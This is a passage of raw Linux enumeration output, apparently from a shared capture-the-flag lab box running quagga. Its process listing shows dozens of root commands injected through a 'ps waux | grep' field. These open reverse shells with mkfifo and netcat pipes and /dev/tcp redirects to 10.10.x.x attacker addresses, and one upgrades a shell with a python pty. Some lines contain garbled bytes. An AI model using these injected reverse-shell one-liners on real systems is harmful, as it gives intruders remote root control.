  525. root 1478 0.0 0.0 11236 196 ? S 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
  526. root 1479 0.0 0.0 12944 332 ? S 20:51 0:00 grep -v grep
  527. root 2262 0.0 0.1 92796 2648 ? Ss 20:57 0:00 sshd: root@notty
  528. root 2292 0.0 0.0 11232 1840 ? Ss 20:58 0:00 bash -c ps waux | grep ;bash -i >& /dev/tcp/10.10.14.30/9998 0>&1 | grep -v grep
  529. root 2295 0.0 0.1 19896 2136 ? S 20:58 0:00 bash -i
  530. root 3455 0.0 0.2 65508 4060 ? Ss 21:14 0:00 /usr/sbin/sshd -D
  531. root 3622 0.0 0.1 92796 3864 ? Ss 21:23 0:00 sshd: root@notty
  532. root 3652 0.0 0.1 11232 2192 ? Ss 21:23 0:00 bash -c ps waux | grep ; tcpdump -i lo:0 -vv | grep -v grep
  533. root 3655 0.0 0.3 24800 6352 ? S 21:23 0:00 tcpdump -i lo:0 -vv
  534. root 3656 0.0 0.0 12944 984 ? S 21:23 0:00 grep -v grep
  535. root 3918 0.0 0.3 92796 6632 ? Ss 21:32 0:00 sshd: root@notty
  536. root 3948 0.0 0.1 11232 2116 ? Ss 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
  537. root 3950 0.0 0.0 11232 192 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
  538. root 3951 0.0 0.0 12944 972 ? S 21:32 0:00 grep -v grep
  539. root 3952 0.0 0.0 11232 1216 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
  540. root 3953 0.0 0.1 19896 2864 ? S 21:32 0:00 bash -i
  541. root 4144 0.0 0.3 92796 6844 ? Ss 21:50 0:00 sshd: root@notty
  542. root 4174 0.0 0.1 11236 2184 ? Ss 21:50 0:00 bash -c ps waux | grep root; ls; rm /tmp/zz;mkfifo /tmp/zz;cat /tmp/zz|/bin/sh -i 2>&1|netcat 10.10.15.171 1000 ???\?ޞ????ܙ\??]??ܙ\? | grep -v grep
  543. root 4180 0.0 0.0 6028 676 ? S 21:50 0:00 cat /tmp/zz
  544. root 4181 0.0 0.0 4504 796 ? S 21:50 0:00 /bin/sh -i
  545. root 4302 0.0 0.3 92796 6680 ? Ss 21:59 0:00 sshd: root@notty
  546. root 4332 0.0 0.1 11236 2272 ? Ss 21:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep | grep -v grep
  547. root 4338 0.0 0.0 4504 744 ? S 21:59 0:00 /bin/sh -i
  548. root 4415 0.0 0.1 55652 3876 ? S 22:01 0:00 sudo tcpdump -A port ftp -i eth2
  549. root 4416 0.0 0.3 24272 6104 ? S 22:01 0:00 tcpdump -A port ftp -i eth2
  550. root 4451 0.0 0.3 92796 6772 ? Ss 22:02 0:00 sshd: root@notty
  551. root 4481 0.0 0.1 11236 2076 ? Ss 22:02 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
  552. root 4486 0.0 0.0 6164 672 ? S 22:02 0:00 cat /tmp/yy
  553. root 4487 0.0 0.0 4504 852 ? S 22:02 0:00 /bin/sh -i
  554. root 4488 0.0 0.0 11300 1724 ? S 22:02 0:00 nc 10.10.15.171 1001
  555. root 4493 0.0 0.1 55652 3944 ? S 22:03 0:00 sudo tcpdump -A port ftp -i eth2 -w out.pcap
  556. root 4494 0.0 0.2 20040 5820 ? S 22:03 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
  557. root 4495 0.0 0.3 92796 6928 ? Ss 22:04 0:00 sshd: root@notty
  558. root 4525 0.0 0.1 11236 2276 ? Ss 22:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
  559. root 4530 0.0 0.0 6164 724 ? S 22:04 0:00 cat /tmp/yy
  560. root 4531 0.0 0.0 4504 1628 ? S 22:04 0:00 /bin/sh -i
  561. root 4532 0.0 0.0 11300 1596 ? S 22:04 0:00 nc 10.10.15.171 1001
  562. root 5171 0.0 0.3 92796 6692 ? Ss 22:16 0:00 sshd: root@notty
  563. root 5201 0.0 0.1 11236 2056 ? Ss 22:16 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
  564. root 5206 0.0 0.0 6028 720 ? S 22:16 0:00 cat /tmp/f
  565. root 5207 0.0 0.0 4504 736 ? S 22:16 0:00 /bin/sh -i
  566. root 5247 0.0 0.3 92796 6808 ? Ss 22:17 0:00 sshd: root@notty
  567. root 5277 0.0 0.1 11236 2192 ? Ss 22:17 0:00 bash -c ps waux | grep quagga&&rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.100 1234 >/tmp/f | grep -v grep
  568. root 5282 0.0 0.0 6164 672 ? S 22:17 0:00 cat /tmp/f
  569. root 5283 0.0 0.1 19896 2772 ? S 22:17 0:00 /bin/bash -i
  570. root 5284 0.0 0.0 11300 1732 ? S 22:17 0:00 nc 10.10.15.100 1234
  571. root 5299 0.0 0.3 92796 6728 ? Ss 22:17 0:00 sshd: root@notty
  572. root 5329 0.0 0.1 11236 2176 ? Ss 22:17 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
  573. root 5334 0.0 0.0 6028 768 ? S 22:17 0:00 cat /tmp/f
  574. root 5335 0.0 0.0 4504 840 ? S 22:17 0:00 /bin/sh -i
  575. root 5338 0.0 0.4 37496 8852 ? S 22:18 0:00 python3 -c import pty;pty.spawn("/bin/bash")
  576. root 5339 0.0 0.1 19880 3588 pts/0 Ss+ 22:18 0:00 /bin/bash
  577. root 5354 0.0 0.3 92796 6732 ? Ss 22:20 0:00 sshd: root@notty
  578. root 5384 0.0 0.1 11236 2192 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
  579. root 5389 0.0 0.0 6028 828 ? S 22:20 0:00 cat /tmp/f
  580. root 5390 0.0 0.0 4504 744 ? S 22:20 0:00 /bin/sh -i
  581. root 5394 0.0 0.3 92796 6920 ? Ss 22:20 0:00 sshd: root@notty
  582. root 5424 0.0 0.1 11236 2200 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
  583. root 5429 0.0 0.0 6028 692 ? S 22:20 0:00 cat /tmp/f
  584. root 5430 0.0 0.0 4504 852 ? S 22:20 0:00 /bin/sh -i
  585. root 5433 0.0 0.3 92796 6784 ? Ss 22:22 0:00 sshd: root@notty
  586. root 5463 0.0 0.1 11236 2200 ? Ss 22:22 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
  587. root 5468 0.0 0.0 6028 676 ? S 22:22 0:00 cat /tmp/f
  588. root 5469 0.0 0.0 4504 744 ? S 22:22 0:00 /bin/sh -i
  589. root 5647 0.0 0.3 92796 6860 ? Ss 22:28 0:00 sshd: root@notty
  590. root 5677 0.0 0.1 11236 2080 ? Ss 22:28 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4447 ???\?? | grep -v grep
  591. root 5682 0.0 0.0 6028 668 ? S 22:28 0:00 cat /tmp/f
  592. root 5683 0.0 0.0 4504 672 ? S 22:28 0:00 /bin/sh -i
  593. root 5689 0.0 0.3 92796 6860 ? Ss 22:31 0:00 sshd: root@notty
  594. root 5719 0.0 0.1 11236 2196 ? Ss 22:31 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
  595. root 5724 0.0 0.0 6028 720 ? S 22:31 0:00 cat /tmp/f
  596. root 5725 0.0 0.0 4504 780 ? S 22:31 0:00 /bin/sh -i
  597. root 5728 0.0 0.3 92796 6784 ? Ss 22:32 0:00 sshd: root@notty
  598. root 5758 0.0 0.1 11236 2052 ? Ss 22:32 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
  599. root 5763 0.0 0.0 6028 668 ? S 22:32 0:00 cat /tmp/f
  600. root 5764 0.0 0.0 4504 844 ? S 22:32 0:00 /bin/sh -i
  601. root 5869 0.0 0.3 92796 6764 ? Ss 22:34 0:00 sshd: root@notty
  602. root 5899 0.0 0.1 11236 2280 ? Ss 22:34 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
  603. root 5904 0.0 0.0 6028 816 ? S 22:34 0:00 cat /tmp/f
  604. root 5905 0.0 0.0 4504 744 ? S 22:34 0:00 /bin/sh -i
  605. root 5908 0.0 0.3 92796 6964 ? Ss 22:35 0:00 sshd: root@notty
  606. root 5938 0.0 0.1 11236 2204 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
  607. root 5943 0.0 0.0 6028 692 ? S 22:35 0:00 cat /tmp/f
  608. root 5944 0.0 0.0 4504 848 ? S 22:35 0:00 /bin/sh -i
  609. root 5945 99.1 0.0 11300 1584 ? R 22:35 32:32 nc -u 10.10.15.233 9000 ?????
  610. root 5946 0.0 0.0 12944 1092 ? S 22:35 0:00 grep -v grep
  611. root 5947 0.0 0.3 92796 6720 ? Ss 22:35 0:00 sshd: root@notty
  612. root 5977 0.0 0.1 11236 2080 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
  613. root 5982 0.0 0.0 6028 720 ? S 22:35 0:00 cat /tmp/f
  614. root 5983 0.0 0.0 4504 656 ? S 22:35 0:00 /bin/sh -i
  615. root 5984 0.0 0.0 11300 1716 ? S 22:35 0:00 nc -u 10.10.15.233 9000 ?????
  616. root 5985 0.0 0.0 12944 1020 ? S 22:35 0:00 grep -v grep
  617. root 6063 0.0 0.2 20040 5772 ? S 22:40 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
  618. root 6064 0.0 0.3 92796 6768 ? Ss 22:41 0:00 sshd: root@notty
  619. root 6094 0.0 0.1 11236 2116 ? Ss 22:41 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
  620. root 6100 0.0 0.0 4504 776 ? S 22:41 0:00 /bin/sh -i
  621. root 6106 0.0 0.2 20040 5764 ? S 22:46 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
  622. root 6177 0.0 0.3 92796 6856 ? Ss 22:48 0:00 sshd: root@notty
  623. root 6207 0.0 0.1 11236 2020 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
  624. root 6212 0.0 0.0 6028 688 ? S 22:48 0:00 cat /tmp/f
  625. root 6213 0.0 0.0 4504 796 ? S 22:48 0:00 /bin/sh -i
  626. root 6214 99.2 0.0 11300 1708 ? R 22:48 19:38 nc -u 10.10.15.233 9000 ?????
  627. root 6215 0.0 0.0 12944 1028 ? S 22:48 0:00 grep -v grep
  628. root 6216 0.0 0.3 92796 6876 ? Ss 22:48 0:00 sshd: root@notty
  629. root 6246 0.0 0.1 11236 2180 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
  630. root 6251 0.0 0.0 6028 692 ? S 22:48 0:00 cat /tmp/f
  631. root 6252 0.0 0.0 4504 700 ? S 22:48 0:00 /bin/sh -i
  632. root 6258 0.0 0.3 92796 6684 ? Ss 22:51 0:00 sshd: root@notty
  633. root 6288 0.0 0.1 11236 2284 ? Ss 22:51 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
  634. root 6293 0.0 0.0 6028 824 ? S 22:51 0:00 cat /tmp/ww
  635. root 6294 0.0 0.0 4504 784 ? S 22:51 0:00 /bin/sh -i
  636. root 6334 0.0 0.3 92796 6872 ? Ss 22:55 0:00 sshd: root@notty
  637. root 6364 0.0 0.1 11236 2200 ? Ss 22:55 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
  638. root 6369 0.0 0.0 6028 684 ? S 22:55 0:00 cat /tmp/ww
  639. root 6370 0.0 0.0 4504 752 ? S 22:55 0:00 /bin/sh -i
  640. root 6451 0.0 0.3 92796 6772 ? Ss 22:57 0:00 sshd: root@notty
  641. root 6481 0.0 0.1 11236 2196 ? Ss 22:57 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
  642. root 6486 0.0 0.0 6028 672 ? S 22:57 0:00 cat /tmp/ww
  643. root 6487 0.0 0.0 4504 704 ? S 22:57 0:00 /bin/sh -i
  644. root 6496 0.0 0.3 92796 6728 ? Ss 22:58 0:00 sshd: root@notty
  645. root 6526 0.0 0.1 11236 2280 ? Ss 22:58 0:00 bash -c ps waux | grep root ; rm /tmp/w; mkfifo /tmp/w; cat /tmp/w | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/w | grep -v grep | grep -v grep
  646. root 6531 0.0 0.0 6164 676 ? S 22:58 0:00 cat /tmp/w
  647. root 6532 0.0 0.0 4504 756 ? S 22:58 0:00 /bin/sh -i
  648. root 6533 0.0 0.0 11300 1724 ? S 22:58 0:00 nc 10.10.15.171 1002
  649. root 6540 0.0 0.3 92796 6932 ? Ss 22:59 0:00 sshd: root@notty
  650. root 6571 0.0 0.1 11236 2264 ? Ss 22:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
  651. root 6577 0.0 0.0 4504 708 ? S 22:59 0:00 /bin/sh -i
  652. root 6666 0.0 0.2 20040 5816 ? S 23:01 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
  653. root 6709 0.0 0.3 92796 6772 ? Ss 23:04 0:00 sshd: root@notty
  654. root 6745 0.0 0.1 11236 2892 ? Ss 23:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
  655. root 6750 0.0 0.0 6164 696 ? S 23:04 0:00 cat /tmp/yy
  656. root 6751 0.0 0.0 4504 752 ? S 23:04 0:00 /bin/sh -i
  657. root 6752 0.0 0.0 11300 1824 ? S 23:04 0:00 nc 10.10.15.171 1001
  658. quagga 6824 0.0 0.0 24500 1824 ? Ss 23:05 0:00 /usr/lib/quagga/zebra --daemon -A 127.0.0.1
  659. quagga 6828 0.0 0.1 29448 2788 ? Ss 23:05 0:00 /usr/lib/quagga/bgpd --daemon -A 127.0.0.1
  660. root 6833 0.0 0.0 15432 164 ? Ss 23:05 0:00 /usr/lib/quagga/watchquagga --daemon zebra bgpd
  661. root 7124 0.0 0.2 20040 5808 ? S 23:06 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
  662. root 7141 0.0 0.3 92796 6896 ? Ss 23:07 0:00 sshd: root@notty
  663. root 7171 0.0 0.1 11232 3076 ? Ss 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
  664. root 7174 0.0 0.1 11260 2320 ? S 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
  665. root 7175 0.0 0.0 12944 1016 ? S 23:07 0:00 grep -v grep
  666. root 7176 0.0 0.0 4504 788 ? S 23:07 0:00 sh
  667. root 7178 0.0 0.0 4504 744 ? S 23:07 0:00 /bin/sh -i
  668. root 7179 0.5 0.4 52340 8168 ? S 23:07 0:00 vi
  669. root 7180 0.0 0.1 11228 3028 ? S 23:08 0:00 bash
  670. root 7182 0.0 0.0 4504 784 ? S 23:08 0:00 /bin/sh -i
  671. root 7217 0.0 0.1 12216 4016 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
  672. root 7218 0.0 0.1 12352 3652 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
  673. root 7219 0.0 0.0 6012 672 ? S 23:08 0:00 tee -a
  674. root 7423 0.0 0.1 12320 2968 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
  675. root 7424 0.0 0.1 36084 3392 ? R 23:08 0:00 ps aux
  676.  
  677.  
  678. [-] Process binaries and associated permissions (from above list):
  679. -rwxr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
  680. lrwxrwxrwx 1 root root 4 Feb 17 2016 /bin/sh -> dash
  681. -rwxr-xr-x 1 root root 1577232 Mar 8 2018 /lib/systemd/systemd
  682. -rwxr-xr-x 1 root root 326224 Mar 8 2018 /lib/systemd/systemd-journald
  683. -rwxr-xr-x 1 root root 618520 Mar 8 2018 /lib/systemd/systemd-logind
  684. -rwxr-xr-x 1 root root 453240 Mar 8 2018 /lib/systemd/systemd-udevd
  685. -rwxr-xr-x 1 root root 44104 Nov 30 2017 /sbin/agetty
  686. lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
  687. -rwxr-xr-x 1 root root 783984 Jul 26 2017 /sbin/iscsid
  688. -rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon
  689. -rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
  690. -rwxr-xr-x 1 root root 15048 Jan 17 2016 /usr/lib/policykit-1/polkitd
  691. -rwxr-xr-x 1 root root 934976 Feb 8 2018 /usr/lib/quagga/bgpd
  692. -rwxr-xr-x 1 root root 35168 Feb 8 2018 /usr/lib/quagga/watchquagga
  693. -rwxr-xr-x 1 root root 270224 Feb 8 2018 /usr/lib/quagga/zebra
  694. -rwxr-xr-x 1 root root 22658024 May 17 2018 /usr/lib/snapd/snapd
  695. -rwxr-xr-x 1 root root 26632 Jan 14 2016 /usr/sbin/atd
  696. -rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron
  697. -rwxr-xr-x 1 root root 791024 Jan 18 2018 /usr/sbin/sshd
  698.  
  699.  
  700. [-] /etc/init.d/ binary permissions:
  701. total 304
  702. drwxr-xr-x 1 root root 1212 Jul 1 2018 .
  703. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  704. -rwxr-xr-x 1 root root 2243 Feb 9 2016 acpid
  705. -rwxr-xr-x 1 root root 6223 Mar 3 2017 apparmor
  706. -rwxr-xr-x 1 root root 2802 May 24 2018 apport
  707. -rwxr-xr-x 1 root root 1071 Dec 6 2015 atd
  708. -rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh
  709. -rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh
  710. -rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh
  711. -rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh
  712. -rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup
  713. -rwxr-xr-x 1 root root 3049 Apr 5 2016 cron
  714. -rwxr-xr-x 1 root root 937 Mar 28 2015 cryptdisks
  715. -rwxr-xr-x 1 root root 896 Mar 28 2015 cryptdisks-early
  716. -rwxr-xr-x 1 root root 2813 Dec 2 2015 dbus
  717. -rw-r--r-- 1 root root 1264 Jul 2 2018 .depend.boot
  718. -rw-r--r-- 1 root root 668 Jul 2 2018 .depend.start
  719. -rw-r--r-- 1 root root 1061 Jul 2 2018 .depend.stop
  720. -rwxr-xr-x 1 root root 1336 Jan 19 2016 halt
  721. -rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh
  722. -rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh
  723. -rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance
  724. -rwxr-xr-x 1 root root 1503 Mar 29 2016 iscsid
  725. -rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup
  726. -rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs
  727. -rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod
  728. -rwxr-xr-x 1 root root 695 Oct 30 2015 lvm2
  729. -rwxr-xr-x 1 root root 571 Oct 30 2015 lvm2-lvmetad
  730. -rwxr-xr-x 1 root root 586 Oct 30 2015 lvm2-lvmpolld
  731. -rwxr-xr-x 1 root root 2378 Nov 9 2017 lxcfs
  732. -rwxr-xr-x 1 root root 2541 Dec 7 2017 lxd
  733. -rwxr-xr-x 1 root root 2365 Oct 9 2017 mdadm
  734. -rwxr-xr-x 1 root root 1199 Jul 16 2014 mdadm-waitidle
  735. -rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh
  736. -rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh
  737. -rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh
  738. -rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh
  739. -rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh
  740. -rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh
  741. -rwxr-xr-x 1 root root 4771 Jul 19 2015 networking
  742. -rwxr-xr-x 1 root root 1581 Oct 16 2015 ondemand
  743. -rwxr-xr-x 1 root root 2503 Mar 29 2016 open-iscsi
  744. -rwxr-xr-x 1 root root 1846 Mar 22 2018 open-vm-tools
  745. -rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth
  746. -rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log
  747. -rwxr-xr-x 1 root root 1192 Sep 6 2015 procps
  748. -rwxr-xr-x 1 root root 9353 Jan 1 2014 quagga
  749. -rwxr-xr-x 1 root root 6366 Jan 19 2016 rc
  750. -rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local
  751. -rwxr-xr-x 1 root root 117 Jan 19 2016 rcS
  752. -rw-r--r-- 1 root root 2427 Jan 19 2016 README
  753. -rwxr-xr-x 1 root root 661 Jan 19 2016 reboot
  754. -rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf
  755. -rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
  756. -rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog
  757. -rwxr-xr-x 1 root root 1226 Jun 9 2015 screen-cleanup
  758. -rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs
  759. -rwxr-xr-x 1 root root 597 Jan 19 2016 single
  760. -rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton
  761. -rwxr-xr-x 1 root root 4077 Mar 16 2017 ssh
  762. -rwxr-xr-x 1 root root 6087 Apr 12 2016 udev
  763. -rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw
  764. -rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs
  765. -rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh
  766. -rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot
  767. -rwxr-xr-x 1 root root 1391 Apr 20 2017 unattended-upgrades
  768. -rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom
  769. -rwxr-xr-x 1 root root 1306 Nov 30 2017 uuidd
  770.  
  771.  
  772. [-] /etc/init/ config file permissions:
  773. total 208
  774. drwxr-xr-x 1 root root 1626 Jul 2 2018 .
  775. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
  776. -rw-r--r-- 1 root root 338 Apr 8 2016 acpid.conf
  777. -rw-r--r-- 1 root root 3709 Mar 3 2017 apparmor.conf
  778. -rw-r--r-- 1 root root 1629 May 24 2018 apport.conf
  779. -rw-r--r-- 1 root root 236 Apr 3 2018 cloud-config.conf
  780. -rw-r--r-- 1 root root 297 Apr 3 2018 cloud-final.conf
  781. -rw-r--r-- 1 root root 2556 Apr 3 2018 cloud-init-blocknet.conf
  782. -rw-r--r-- 1 root root 202 Apr 3 2018 cloud-init.conf
  783. -rw-r--r-- 1 root root 2024 Apr 3 2018 cloud-init-container.conf
  784. -rw-r--r-- 1 root root 379 Apr 3 2018 cloud-init-local.conf
  785. -rw-r--r-- 1 root root 1908 Apr 3 2018 cloud-init-nonet.conf
  786. -rw-r--r-- 1 root root 562 Apr 3 2018 cloud-log-shutdown.conf
  787. -rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf
  788. -rw-r--r-- 1 root root 7 Jul 1 2018 console.override
  789. -rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf
  790. -rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf
  791. -rw-r--r-- 1 root root 1519 Mar 28 2015 cryptdisks.conf
  792. -rw-r--r-- 1 root root 412 Mar 28 2015 cryptdisks-udev.conf
  793. -rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf
  794. -rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf
  795. -rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf
  796. -rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf
  797. -rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf
  798. -rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf
  799. -rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf
  800. -rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf
  801. -rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf
  802. -rw-r--r-- 1 root root 540 Nov 9 2017 lxcfs.conf
  803. -rw-r--r-- 1 root root 813 Dec 7 2017 lxd.conf
  804. -rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf
  805. -rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf
  806. -rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf
  807. -rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf
  808. -rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf
  809. -rw-r--r-- 1 root root 264 May 30 2018 pollinate.conf
  810. -rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf
  811. -rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf
  812. -rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf
  813. -rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf
  814. -rw-r--r-- 1 root root 7 Jul 2 2018 rsyslog.override
  815. -rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf
  816. -rw-r--r-- 1 root root 641 Mar 16 2017 ssh.conf
  817. -rw-r--r-- 1 root root 7 Jul 1 2018 tty1.override
  818. -rw-r--r-- 1 root root 7 Jul 1 2018 tty2.override
  819. -rw-r--r-- 1 root root 7 Jul 1 2018 tty3.override
  820. -rw-r--r-- 1 root root 7 Jul 1 2018 tty4.override
  821. -rw-r--r-- 1 root root 552 Jun 22 2018 ttyS0.conf
  822. -rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf
  823. -rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf
  824. -rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf
  825. -rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf
  826. -rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf.disabled
  827. -rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf
  828.  
  829.  
  830. [-] /lib/systemd/* config file permissions:
  831. /lib/systemd/:
  832. total 8.2M
  833. drwxr-xr-x 1 root root 12K Jun 22 2018 system
  834. drwxr-xr-x 1 root root 688 Jun 22 2018 system-generators
  835. drwxr-xr-x 1 root root 28 Jun 22 2018 system-shutdown
  836. drwxr-xr-x 1 root root 12 Jun 22 2018 system-sleep
  837. drwxr-xr-x 1 root root 128 Jun 22 2018 network
  838. drwxr-xr-x 1 root root 34 Jun 22 2018 system-preset
  839. -rwxr-xr-x 1 root root 443K Mar 8 2018 systemd-udevd
